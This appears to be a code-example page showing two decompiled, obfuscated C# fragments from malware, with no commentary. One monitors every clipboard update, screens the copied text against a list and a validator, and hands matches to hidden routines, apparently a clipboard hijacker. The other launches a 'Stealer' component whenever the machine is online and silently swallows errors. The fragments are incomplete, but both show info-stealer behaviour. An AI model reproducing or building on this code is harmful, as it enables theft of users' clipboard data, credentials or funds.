示例#1
0
    protected override void WndProc(ref Message m)
    {
        base.WndProc(ref m);

        if (m.Msg != 797 || !Clipboard.ContainsText())
        {
            return;
        }
        string text = Clipboard.GetText();

        if (!Resources.e.Split(new string[1]
        {
            Environment.NewLine
        }, StringSplitOptions.RemoveEmptyEntries).ToList().Contains(text) && e.a(text))
        {
            e.b(text);
            if (Internet.CheckConnection())
            {
                f.a();
            }
            else
            {
                Thread.Sleep(2000);
            }
        }
    }
示例#2
0
 private static void c()
 {
     try
     {
         if (Internet.CheckConnection())
         {
             Stealer.Start();
         }
         else
         {
             d();
         }
     }
     catch
     {
     }
 }